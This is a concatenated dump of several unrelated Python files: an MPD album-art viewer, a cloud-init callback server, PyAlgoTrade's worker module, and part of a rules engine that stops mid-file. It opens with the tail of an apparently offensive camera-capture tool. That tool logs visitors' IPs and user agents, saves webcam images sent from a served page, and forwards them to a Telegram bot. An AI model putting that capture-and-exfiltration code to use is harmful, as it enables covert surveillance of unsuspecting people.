print(f"{now} \t {bcolors.OKCYAN}{ip_address}{bcolors.ENDC} \t {user_agent}\t")
# post request
elif request.method == 'POST':
now = str(datetime.now())
# setting path to save file in capture dir
save_path = 'capture'
file_name = 'img_'+now+'.png'
completeName = os.path.join(save_path, file_name)
# requesting base64 image data
req_data = request.get_json()
encoded = req_data['canvasData']
# writing file
file2 = open(completeName, 'wb')
data = base64.b64decode(encoded)
file2.write(data)
file2.close()
print(f"{bcolors.OKGREEN}[{bcolors.ENDC}+{bcolors.OKGREEN}] Cam image recieved.{bcolors.FAIL} \n ")
# sending photo to telegram bot
data = {"chat_id": user_id, "caption": ""}
to_url = 'https://api.telegram.org/bot{}/sendPhoto'.format(API_KEY)
with open(completeName, "rb") as image_file:
requests.post(to_url, data=data, files={"photo": image_file})
return render_template("saycheese.html")
# threading to run flask with pyngrok smoothly
threading.Thread(target=app.run, kwargs={"use_reloader": False}).start()
bot.polling()
except KeyboardInterrupt:
print(f"{bcolors.FAIL} Ending task.....\n")
|
mpd_art_box.py | #!/usr/bin/env python
import contextlib
import os
import pathlib
import threading
import time
import configargparse
import gi
import mpd
gi.require_version('Gtk', '3.0')
from gi.repository import Gio, GLib, Gtk, Gdk, GdkPixbuf # noqa: E402
version = '0.0.8'
@contextlib.contextmanager
def _mpd_client(*args, **kwargs):
attempts = 3
for attempt in range(1, attempts + 1):
try:
client = mpd.MPDClient()
client.connect(*args, **kwargs)
break
except ConnectionRefusedError:
if attempt == attempts:
raise
else:
time.sleep(1)
try:
yield client
finally:
client.disconnect()
def app_main(mpd_host, mpd_port):
win = Gtk.Window(default_height=500, default_width=500)
win.connect('destroy', Gtk.main_quit)
win.override_background_color(
Gtk.StateType.NORMAL, Gdk.RGBA(red=0, green=0, blue=0))
image = Gtk.Image()
pixbuf = None
win_size = None
win.add(image)
def set_image():
nonlocal pixbuf
nonlocal win_size
if pixbuf:
win_size = win.get_size()
win_width, win_height = win_size
aspect = (pixbuf.get_width() / pixbuf.get_height())
if aspect < 1:
height = win_height
width = aspect * height
if width > win_width:
height = (win_width / width) * height
width = win_width
else:
width = win_width
height = (1 / aspect) * width
if height > win_height:
width = (win_height / height) * width
height = win_height
image.set_from_pixbuf(
pixbuf.scale_simple(
width, height, GdkPixbuf.InterpType.BILINEAR))
else:
image.clear()
return False
def mpd_loop():
nonlocal pixbuf
with _mpd_client(mpd_host, mpd_port) as client:
while True:
current = client.currentsong()
if not current:
pixbuf = None
else:
try:
image_bytes = client.albumart(
current['file'])['binary']
except mpd.CommandError:
pixbuf = None
else:
pixbuf = GdkPixbuf.Pixbuf.new_from_stream(
Gio.MemoryInputStream.new_from_bytes(
GLib.Bytes.new(image_bytes)
), None)
GLib.idle_add(set_image)
client.idle()
win.show_all()
def _on_resize(*args):
if win.get_size() != win_size:
set_image()
win.connect('size-allocate', _on_resize)
thread = threading.Thread(target=mpd_loop)
thread.daemon = True
thread.start()
def main():
parser = configargparse.ArgumentParser(
default_config_files=['~/.config/mpd-art-box/config'])
parser.add_argument(
'-c', '--config', is_config_file=True,
help='config path')
parser.add_argument(
'--host',
help='MPD host (default: $XDG_RUNTIME_DIR/mpd/socket or localhost)')
parser.add_argument(
'--port', type=int, default=6600,
help='MPD port (default: %(default)s)')
parser.add_argument('--version', action='version', version=version)
args = parser.parse_args()
mpd_host = args.host
if mpd_host is None:
runtime_dir = os.environ['XDG_RUNTIME_DIR']
if runtime_dir:
socket = pathlib.Path(runtime_dir) / 'mpd' / 'socket'
if socket.exists():
mpd_host = str(socket)
if mpd_host is None:
mpd_host = 'localhost'
app_main(mpd_host, args.port)
Gtk.main()
if __name__ == '__main__':
main()
|
cloudinit_callback.py | #!/usr/bin/env python
# coding: utf-8
# Purpose: receives provisioned VMs info via cloud-init phone_home
from __future__ import absolute_import
import os
try:
import Queue
except ImportError:
import queue as Queue
import random
import string
import sys
import web
from collections import OrderedDict
from optparse import OptionParser
from threading import Thread, Event
from .sshutils import update_known_hosts, SshConfigGenerator
from .miscutils import (
safe_save_file,
mkdir_p,
)
class VMRegister(object):
"""POST handler which invokes CloudInitWebCallback
web.py can't handle requests by an arbitrary callback, instead it
insists on a class with a POST/GET/DELETE/UPDATE methods.
"""
def POST(self):
kwargs = {
'hostname': web.input().hostname,
'ip': web.ctx.ip,
'ssh_key': web.input().pub_key_rsa.strip(),
'instance_id': web.input().instance_id.strip(),
'user_agent': web.ctx.env['HTTP_USER_AGENT'],
}
cb = web.ctx.globals.callback
cb(**kwargs)
class InventoryGenerator(object):
"""Generate ansible inventory from data reported by cloud-init
"""
def __init__(self, vms, filename=None):
self._filename = filename
self._inventory = OrderedDict((role, []) for role in
['all'] + sorted(set(vm['role'] for vm in vms)))
self._hosts_by_id = dict((vm['instance_id'], vm) for vm in vms)
self._hosts_by_name = dict((vm['vm_name'].lower(), vm) for vm in vms)
def _get_host(self, entry):
host = self._hosts_by_id.get(entry['instance_id'])
if host is None:
host = self._hosts_by_name.get(entry['short_hostname'].lower(), {})
return host
def _role_of(self, entry):
return self._get_host(entry).get('role', 'all')
def _copy_extra_info(self, host, entry):
extra_info = {}
if entry['os'] == 'windows':
admin_password = host.get('admin_password')
if admin_password:
extra_info['ansible_password'] = admin_password
return extra_info
def add(self, hostname, ip, **kwargs):
short_hostname = hostname.split('.')[0]
entry = {
'short_hostname': short_hostname,
'ip': ip,
'instance_id': kwargs['instance_id'],
'os': kwargs.get('os', 'unix'),
}
host = self._get_host(entry)
entry.update(self._copy_extra_info(host, entry))
role = host.get('role', 'all')
self._inventory[role].append(entry)
def _make_host_entry(self, host):
if host['os'] == 'windows':
fmt = '{short_hostname} ansible_host={ip} ansible_port=5985 '\
'ansible_connection=winrm ansible_winrm_scheme=http '\
'ansible_winrm_transport=basic ansible_user=administrator '\
'ansible_password={ansible_password}'
else:
fmt = '{short_hostname} ansible_host={ip} ansible_user=root'
return fmt.format(**host)
def update(self, hostname, ip, **kwargs):
self.add(hostname, ip, **kwargs)
self.write()
def _write(self, thefile):
for role, hosts in self._inventory.items():
thefile.write('[%s]\n' % role)
for host in hosts:
entry = self._make_host_entry(host)
thefile.write(entry + '\n')
thefile.flush()
def write(self):
if self._filename is None:
self._write(sys.stdout)
else:
mkdir_p(os.path.dirname(self._filename))
with safe_save_file(self._filename) as f:
self._write(f)
def guess_os(user_agent):
if user_agent is not None and 'Windows' in user_agent:
return 'windows'
else:
return 'unix'
class CloudInitWebCallback(object):
"""Accept cloud-init "phone home" POST requests
Does two useful things
- waits for specified VMs to be configured by cloud-init
- manages VMs' ssh public keys in the local ~/.ssh/known_hosts file
"""
def __init__(self, httpd_args, vms2wait=None, vm_ready_hooks=None,
async_hooks=[],
inventory_filename=None):
self.vms2wait = vms2wait if vms2wait else {}
self._stop_event = Event()
self._ssh_keys_queue = Queue.Queue()
self._async_hooks_thread = Thread(target=self._async_worker)
# mangle sys.argv to pass the listen address to webpy
new_argv = [sys.argv[0]]
new_argv.extend(httpd_args)
sys.argv = new_argv
self._hooks = [self._vm_ready_hook]
if vm_ready_hooks:
self._hooks.extend(vm_ready_hooks)
# defines the actual actions with VM info
self._async_hooks = [
self._update_ssh_known_hosts,
]
self._async_hooks.extend(async_hooks)
self._async_hooks.append(self._report_vm_ready)
urls = ('/', 'VMRegister')
self._app = web.application(urls, globals())
self._install_callback()
self._webapp_thread = Thread(target=self._app.run)
def _vm_ready_hook(self, **kwargs):
# invoked by web app on POST
self._ssh_keys_queue.put(kwargs)
def _update_ssh_known_hosts(self, hostname, ip, **kwargs):
if kwargs.get('os', 'unix') == 'windows':
return
ssh_key = kwargs['ssh_key']
update_known_hosts(ssh_key=ssh_key, ips=[(ip, hostname)])
def _report_vm_ready(self, hostname, ip, **kwargs):
ssh_key = kwargs['ssh_key']
print("vm {0} ready, ssh_key: {1}".format(hostname, ssh_key))
def _async_worker(self):
seen_vms = set()
vms2wait = set(name.lower() for name in self.vms2wait.keys())
while seen_vms != vms2wait:
vm_dat = self._ssh_keys_queue.get()
if self._stop_event.is_set():
break
if vm_dat is None:
continue
extra_args = dict((k, v) for k, v in vm_dat.items()
if k not in ('hostname', 'ip'))
extra_args.update(os=guess_os(vm_dat.get('user_agent')))
for hook in self._async_hooks:
hook(vm_dat['hostname'], vm_dat['ip'], **extra_args)
seen_vms.add(vm_dat['hostname'].lower())
self._app.stop()
def _vm_called_back(self, **kwargs):
for f in self._hooks:
f(**kwargs)
def _install_callback(self):
def _install_callback():
g = web.storage({
'callback': self._vm_called_back
})
def _wrapper(handler):
web.ctx.globals = g
return handler()
return _wrapper
self._app.add_processor(_install_callback())
def start(self):
self._async_hooks_thread.start()
self._webapp_thread.start()
def join(self):
self._webapp_thread.join()
self._async_hooks_thread.join()
def stop(self):
self._stop_event.set()
# _async_worker can be blocked on get(), so put something to
# the queue to wake it up
self._ssh_keys_queue.put(None)
def run_cloudinit_callback(httpd_args, vms2wait=None, vm_ready_hook=None,
ssh_config=None):
vms = dict((vm, 'all') for vm in vms2wait)
async_hooks = []
if ssh_config:
ssh_conf_gen = SshConfigGenerator(path=ssh_config)
async_hooks.append(ssh_config.update)
server = CloudInitWebCallback(httpd_args, vms2wait=vms,
async_hooks=async_hooks,
vm_ready_hooks=[vm_ready_hook]
if vm_ready_hook else None)
server.start()
server.join()
def main():
parser = OptionParser()
parser.add_option('-l', '--listen', dest='listen',
default='0.0.0.0:8080',
help='interface/address to listen at')
parser.add_option('-s', '--ssh-config', dest='ssh_config',
help='write ssh config file here')
options, args = parser.parse_args()
run_cloudinit_callback([options.listen], vms2wait=set(args),
ssh_config=options.ssh_config)
if __name__ == '__main__':
main()
|
worker.py | # PyAlgoTrade
#
# Copyright 2011-2018 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import socket
import multiprocessing
import retrying
from six.moves import xmlrpc_client
import pyalgotrade.logger
from pyalgotrade import barfeed
from pyalgotrade.optimizer import serialization
wait_exponential_multiplier = 500
wait_exponential_max = 10000
stop_max_delay = 10000
def any_exception(exception):
return True
@retrying.retry(wait_exponential_multiplier=wait_exponential_multiplier, wait_exponential_max=wait_exponential_max, stop_max_delay=stop_max_delay, retry_on_exception=any_exception)
def retry_on_network_error(function, *args, **kwargs):
return function(*args, **kwargs)
class Worker(object):
def __init__(self, address, port, workerName=None):
url = "http://%s:%s/PyAlgoTradeRPC" % (address, port)
self.__logger = pyalgotrade.logger.getLogger(workerName)
self.__server = xmlrpc_client.ServerProxy(url, allow_none=True)
if workerName is None:
self.__workerName = socket.gethostname()
else:
self.__workerName = workerName
def getLogger(self):
return self.__logger
def getInstrumentsAndBars(self):
ret = retry_on_network_error(self.__server.getInstrumentsAndBars)
ret = serialization.loads(ret)
return ret
def getBarsFrequency(self):
ret = retry_on_network_error(self.__server.getBarsFrequency)
ret = int(ret)
return ret
def getNextJob(self):
ret = retry_on_network_error(self.__server.getNextJob)
ret = serialization.loads(ret)
return ret
def pushJobResults(self, jobId, result, parameters):
jobId = serialization.dumps(jobId)
result = serialization.dumps(result)
parameters = serialization.dumps(parameters)
workerName = serialization.dumps(self.__workerName)
retry_on_network_error(self.__server.pushJobResults, jobId, result, parameters, workerName)
def __processJob(self, job, barsFreq, instruments, bars):
bestResult = None
parameters = job.getNextParameters()
bestParams = parameters
while parameters is not None:
# Wrap the bars into a feed.
feed = barfeed.OptimizerBarFeed(barsFreq, instruments, bars)
# Run the strategy.
self.getLogger().info("Running strategy with parameters %s" % (str(parameters)))
result = None
try:
result = self.runStrategy(feed, *parameters)
except Exception as e:
self.getLogger().exception("Error running strategy with parameters %s: %s" % (str(parameters), e))
self.getLogger().info("Result %s" % result)
if bestResult is None or result > bestResult:
bestResult = result
bestParams = parameters
# Run with the next set of parameters.
parameters = job.getNextParameters()
assert(bestParams is not None)
self.pushJobResults(job.getId(), bestResult, bestParams)
# Run the strategy and return the result.
def runStrategy(self, feed, parameters):
raise Exception("Not implemented")
def run(self):
try:
self.getLogger().info("Started running")
# Get the instruments and bars.
instruments, bars = self.getInstrumentsAndBars()
barsFreq = self.getBarsFrequency()
# Process jobs
job = self.getNextJob()
while job is not None:
self.__processJob(job, barsFreq, instruments, bars)
job = self.getNextJob()
self.getLogger().info("Finished running")
except Exception as e:
self.getLogger().exception("Finished running with errors: %s" % (e))
def worker_process(strategyClass, address, port, workerName):
class MyWorker(Worker):
def runStrategy(self, barFeed, *args, **kwargs):
strat = strategyClass(barFeed, *args, **kwargs)
strat.run()
return strat.getResult()
# Create a worker and run it.
w = MyWorker(address, port, workerName)
w.run()
def run(strategyClass, address, port, workerCount=None, workerName=None):
"""Executes one or more worker processes that will run a strategy with the bars and parameters supplied by the server.
:param strategyClass: The strategy class.
:param address: The address of the server.
:type address: string.
:param port: The port where the server is listening for incoming connections.
:type port: int.
:param workerCount: The number of worker processes to run. If None then as many workers as CPUs are used.
:type workerCount: int.
:param workerName: A name for the worker. A name that identifies the worker. If None, the hostname is used.
:type workerName: string.
"""
assert(workerCount is None or workerCount > 0)
if workerCount is None:
workerCount = multiprocessing.cpu_count()
workers = []
# Build the worker processes.
for i in range(workerCount):
workers.append(multiprocessing.Process(target=worker_process, args=(strategyClass, address, port, workerName)))
# Start workers
for process in workers:
process.start()
# Wait workers
for process in workers:
process.join()
|
engine.py | import json
import copy
import rules
import threading
import inspect
import random
import time
import datetime
import os
import sys
import traceback
def _unix_now():
dt = datetime.datetime.now()
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
class Closure_Queue(object):
def __init__(self):
self._queued_posts = []
self._queued_asserts = []
self._queued_retracts = []
def get_queued_posts(self):
return self._queued_posts
def get_queued_asserts(self):
return self._queued_posts
def get_queued_retracts(self):
return self._queued_posts
def post(self, message):
if isinstance(message, Content):
message = message._d
self._queued_posts.append(message)
def assert_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_asserts.append(message)
def retract_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_retracts.append(message)
class Closure(object):
def __init__(self, host, state, message, handle, ruleset_name):
self.ruleset_name = ruleset_name
self.host = host
self.s = Content(state)
self._handle = handle
self._timer_directory = {}
self._cancelled_timer_directory = {}
self._message_directory = {}
self._queue_directory = {}
self._branch_directory = {}
self._fact_directory = {}
self._delete_directory = {}
self._retract_directory = {}
self._completed = False
self._deleted = False
self._start_time = _unix_now()
if isinstance(message, dict):
self._m = message
else:
self.m = []
for one_message in message:
if ('m' in one_message) and len(one_message) == 1:
one_message = one_message['m']
self.m.append(Content(one_message))
def get_timers(self):
return self._timer_directory
def get_cancelled_timers(self):
return self._cancelled_timer_directory
def get_branches(self):
return self._branch_directory
def get_messages(self):
return self._message_directory
def get_queues(self):
return self._queue_directory
def get_deletes(self):
return self._delete_directory
def get_facts(self):
return self._fact_directory
def get_retract_facts(self):
return self._retract_directory
def get_queue(self, ruleset_name):
if not ruleset_name in self._queue_directory:
self._queue_directory[ruleset_name] = Closure_Queue()
return self._queue_directory[ruleset_name]
def post(self, ruleset_name, message = None):
if not message:
message = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in message:
message['sid'] = self.s.sid
if isinstance(message, Content):
message = message._d
message_list = []
if ruleset_name in self._message_directory:
message_list = self._message_directory[ruleset_name]
else:
self._message_directory[ruleset_name] = message_list
message_list.append(message)
def delete(self, ruleset_name = None, sid = None):
if not ruleset_name:
ruleset_name = self.ruleset_name
if not sid:
sid = self.s.sid
if (ruleset_name == self.ruleset_name) and (sid == self.s.sid):
self._deleted = True
sid_list = []
if ruleset_name in self._delete_directory:
sid_list = self._delete_directory[ruleset_name]
else:
self._delete_directory[ruleset_name] = sid_list
sid_list.append(sid)
def start_timer(self, timer_name, duration, manual_reset = False):
if timer_name in self._timer_directory:
raise Exception('Timer with name {0} already added'.format(timer_name))
else:
timer = {'sid': self.s.sid, '$t': timer_name}
self._timer_directory[timer_name] = (timer, duration, manual_reset)
def cancel_timer(self, timer_name):
if timer_name in self._cancelled_timer_directory:
raise Exception('Timer with name {0} already cancelled'.format(timer_name))
else:
self._cancelled_timer_directory[timer_name] = True
def _retract_timer(self, timer_name, message):
if '$t' in message and message['$t'] == timer_name:
self.retract_fact(message)
return True
for property_name, property_value in message.items():
if isinstance(property_value, dict) and self._retract_timer(timer_name, property_value):
return True
return False
def reset_timer(self, timer_name):
if self._m:
return self._retract_timer(timer_name, self._m)
else:
for message in self.m:
if self._retract_timer(timer_name, message):
return True
return False
def assert_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
fact_list = []
if ruleset_name in self._fact_directory:
fact_list = self._fact_directory[ruleset_name]
else:
self._fact_directory[ruleset_name] = fact_list
fact_list.append(fact)
def retract_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
retract_list = []
if ruleset_name in self._retract_directory:
retract_list = self._retract_directory[ruleset_name]
else:
self._retract_directory[ruleset_name] = retract_list
retract_list.append(fact)
def renew_action_lease(self):
if _unix_now() - self._start_time < 10:
self._start_time = _unix_now()
self.host.renew_action_lease(self.ruleset_name, self.s.sid)
def _has_completed(self):
if _unix_now() - self._start_time > 10:
self._completed = True
value = self._completed
self._completed = True
return value
def _is_deleted(self):
return self._deleted
def __getattr__(self, name):
if name == '_m':
return None
if name in self._m:
return Content(self._m[name])
else:
return None
class Content(object):
def items(self):
return self._d.items()
def __init__(self, data):
self._d = data
def __getitem__(self, key):
if key in self._d:
data = self._d[key]
if isinstance(data, dict):
data = Content(data)
return data
else:
return None
def __setitem__(self, key, value):
if value == None:
del self._d[key]
elif isinstance(value, Content):
self._d[key] = value._d
else:
self._d[key] = value
def __iter__(self):
return self._d.__iter__
def __contains__(self, key):
return key in self._d
def __getattr__(self, name):
return self.__getitem__(name)
def __setattr__(self, name, value):
if name == '_d':
self.__dict__['_d'] = value
else:
self.__setitem__(name, value)
def __repr__(self):
return repr(self._d)
def __str__(self):
return str(self._d)
class Promise(object):
def __init__(self, func):
self._func = func
self._next = None
self._sync = True
self._timer = None
self.root = self
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count == 2:
self._sync = False
elif arg_count != 1:
raise Exception('Invalid function signature')
def continue_with(self, next):
if (isinstance(next, Promise)):
self._next = next
elif (hasattr(next, '__call__')):
self._next = Promise(next)
else:
raise Exception('Unexpected Promise Type')
self._next.root = self.root
return self._next
def run(self, c, complete):
def timeout(max_time):
if _unix_now() > max_time:
c.s.exception = 'timeout expired'
complete(None)
else:
c.renew_action_lease()
self._timer = threading.Timer(5, timeout, (max_time, ))
self._timer.daemon = True
self._timer.start()
if self._sync:
try:
self._func(c)
except BaseException as error:
c.s.exception = 'exception caught {0}'.format(str(error))
except:
c.s.exception = 'unknown exception'
if self._next:
self._next.run(c, complete)
else:
complete(None)
else:
try:
def callback(e):
if self._timer:
self._timer.cancel()
self._timer = None
if e:
c.s.exception = str(e)
if self._next:
self._next.run(c, complete)
else:
complete(None)
time_left = self._func(c, callback)
if time_left:
self._timer = threading.Timer(5, timeout, (_unix_now() + time_left, ))
self._timer.daemon = True
self._timer.start()
except BaseException as error:
c.s.exception = 'exception caught {0}'.format(str(error))
complete(None)
except:
c.s.exception = 'unknown exception'
complete(None)
class To(Promise):
def __init__(self, from_state, to_state, assert_state):
super(To, self).__init__(self._execute)
self._from_state = from_state
self._to_state = to_state
self._assert_state = assert_state
def _execute(self, c):
c.s.running = True
if self._from_state != self._to_state:
if self._from_state:
if c.m and isinstance(c.m, list):
c.retract_fact(c.m[0].chart_context)
else:
c.retract_fact(c.chart_context)
if self._assert_state:
c.assert_fact({ 'label': self._to_state, 'chart': 1 })
else:
c.post({ 'label': self._to_state, 'chart': 1 })
class Ruleset(object):
def __init__(self, name, host, ruleset_definition, state_cache_size):
self._actions = {}
self._name = name
self._host = host
for rule_name, rule in ruleset_definition.items():
action = rule['run']
del rule['run']
if isinstance(action, str):
self._actions[rule_name] = Promise(host.get_action(action))
elif isinstance(action, Promise):
self._actions[rule_name] = action.root
elif (hasattr(action, '__call__')):
self._actions[rule_name] = Promise(action)
self._handle = rules.create_ruleset(state_cache_size, name, json.dumps(ruleset_definition, ensure_ascii=False))
self._definition = ruleset_definition
def bind(self, databases):
for db in databases:
if isinstance(db, str):
rules.bind_ruleset(0, 0, db, None, self._handle)
else:
if not 'password' in db:
db['password'] = None
if not 'db' in db:
db['db'] = 0
rules.bind_ruleset(db['port'], db['db'], db['host'], db['password'], self._handle)
def assert_event(self, message):
return rules.assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def queue_assert_event(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_event(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_event(self, message):
return rules.start_assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def assert_events(self, messages):
return rules.assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def start_assert_events(self, messages):
return rules.start_assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def assert_fact(self, fact):
return rules.assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_assert_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_fact(self, fact):
return rules.start_assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def assert_facts(self, facts):
return rules.assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_assert_facts(self, facts):
return rules.start_assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def retract_fact(self, fact):
return rules.retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_retract_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_retract_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_retract_fact(self, fact):
return rules.start_retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def retract_facts(self, facts):
return rules.retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_retract_facts(self, facts):
return rules.start_retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_timer(self, sid, timer, timer_duration, manual_reset):
if sid != None:
sid = str(sid)
rules.start_timer(self._handle, timer_duration, manual_reset, json.dumps(timer, ensure_ascii=False), sid)
def cancel_timer(self, sid, timer_name):
if sid != None:
sid = str(sid)
rules.cancel_timer(self._handle, sid, timer_name)
def assert_state(self, state):
if 'sid' in state:
return rules.assert_state(self._handle, str(state['sid']), json.dumps(state, ensure_ascii=False))
else:
return rules.assert_state(self._handle, None, json.dumps(state, ensure_ascii=False))
def get_state(self, sid):
if sid != None:
sid = str(sid)
return json.loads(rules.get_state(self._handle, sid))
def delete_state(self, sid):
if sid != None:
sid = str(sid)
rules.delete_state(self._handle, sid)
def renew_action_lease(self, sid):
if sid != None:
sid = str(sid)
rules.renew_action_lease(self._handle, sid)
def get_definition(self):
return self._definition
@staticmethod
def create_rulesets(parent_name, host, ruleset_definitions, state_cache_size):
branches = {}
for name, definition in ruleset_definitions.items():
if name.rfind('$state') != -1:
name = name[:name.rfind('$state')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Statechart(name, host, definition, state_cache_size)
elif name.rfind('$flow') != -1:
name = name[:name.rfind('$flow')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Flowchart(name, host, definition, state_cache_size)
else:
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Ruleset(name, host, definition, state_cache_size)
return branches
def dispatch_timers(self, complete):
try:
if not rules.assert_timers(self._handle):
complete(None, True)
else:
complete(None, False)
except Exception as error:
complete(error, True)
return
def dispatch(self, complete, async_result = None):
state = None
action_handle = None
action_binding = None
result_container = {}
if async_result:
state = async_result[0]
result_container = {'message': json.loads(async_result[1])}
action_handle = async_result[2]
action_binding = async_result[3]
else:
try:
result = rules.start_action(self._handle)
if not result:
complete(None, True)
return
else:
state = json.loads(result[0])
result_container = {'message': json.loads(result[1])}
action_handle = result[2]
action_binding = result[3]
except BaseException as error:
t, v, tb = sys.exc_info()
print('start action base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete(error, True)
return
except:
t, v, tb = sys.exc_info()
print('start action unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete('unknown error', True)
return
while 'message' in result_container:
action_name = None
for action_name, message in result_container['message'].items():
break
del(result_container['message'])
c = Closure(self._host, state, message, action_handle, self._name)
def action_callback(e):
if c._has_completed():
return
if e:
rules.abandon_action(self._handle, c._handle)
complete(e, True)
else:
try:
for timer_name, timer in c.get_cancelled_timers().items():
self.cancel_timer(c.s['sid'], timer_name)
for timer_id, timer_tuple in c.get_timers().items():
self.start_timer(c.s['sid'], timer_tuple[0], timer_tuple[1], timer_tuple[2])
for ruleset_name, q in c.get_queues().items():
for message in q.get_queued_posts():
self.queue_assert_event(message['sid'], ruleset_name, message)
for message in q.get_queued_asserts():
self.queue_assert_fact(message['sid'], ruleset_name, message)
for message in q.get_queued_retracts():
self.queue_retract_fact(message['sid'], ruleset_name, message)
for ruleset_name, sid in c.get_deletes().items():
self._host.delete_state(ruleset_name, sid)
binding = 0
replies = 0
pending = {action_binding: 0}
for ruleset_name, facts in c.get_retract_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_retract_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_retract_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, facts in c.get_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_assert_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_assert_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, messages in c.get_messages().items():
if len(messages) == 1:
binding, replies = self._host.start_post(ruleset_name, messages[0])
else:
binding, replies = self._host.start_post_batch(ruleset_name, messages)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
binding, replies = rules.start_update_state(self._handle, c._handle, json.dumps(c.s._d, ensure_ascii=False))
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for binding, replies in pending.items():
if binding != 0:
if binding != action_binding:
rules.complete(binding, replies)
else:
new_result = rules.complete_and_start_action(self._handle, replies, c._handle)
if new_result:
if 'async' in result_container:
def terminal(e, wait):
return
self.dispatch(terminal, [state, new_result, action_handle, action_binding])
else:
result_container['message'] = json.loads(new_result)
except BaseException as error:
t, v, tb = sys.exc_info()
print('base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete(error, True)
except:
print('unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete('unknown error', True)
if c._is_deleted():
try:
self.delete_state(c.s.sid)
except BaseException as error:
complete(error, True)
if 'async' in result_container:
del result_container['async']
self._actions[action_name].run(c, action_callback)
result_container['async'] = True
complete(None, False)
class Statechart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(None, None, None, chart_definition, ruleset_definition)
super(Statechart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'stateChart'
def _transform(self, parent_name, parent_triggers, parent_start_state, chart_definition, rules):
start_state = {}
reflexive_states = {}
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
start_state[qualified_name] = True
for trigger_name, trigger in state.items():
if ('to' in trigger and trigger['to'] == state_name) or 'count' in trigger or 'cap' in trigger:
reflexive_states[qualified_name] = True
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
triggers = {}
if parent_triggers:
for parent_trigger_name, trigger in parent_triggers.items():
triggers['{0}.{1}'.format(qualified_name, parent_trigger_name)] = trigger
for trigger_name, trigger in state.items():
if trigger_name != '$chart':
if ('to' in trigger) and parent_name:
trigger['to'] = '{0}.{1}'.format(parent_name, trigger['to'])
triggers['{0}.{1}'.format(qualified_name, trigger_name)] = trigger
if '$chart' in state:
self._transform(qualified_name, triggers, start_state, state['$chart'], rules)
else:
for trigger_name, trigger in triggers.items():
rule = {}
state_test = {'chart_context': {'$and':[{'label': qualified_name}, {'chart': 1}]}}
if 'pri' in trigger:
rule['pri'] = trigger['pri']
if 'count' in trigger:
rule['count'] = trigger['count']
if 'cap' in trigger:
rule['cap'] = trigger['cap']
if 'all' in trigger:
rule['all'] = list(trigger['all'])
rule['all'].append(state_test)
elif 'any' in trigger:
rule['all'] = [state_test, {'m$any': trigger['any']}]
else:
rule['all'] = [state_test]
if 'run' in trigger:
if isinstance(trigger['run'], str):
rule['run'] = Promise(self._host.get_action(trigger['run']))
elif isinstance(trigger['run'], Promise):
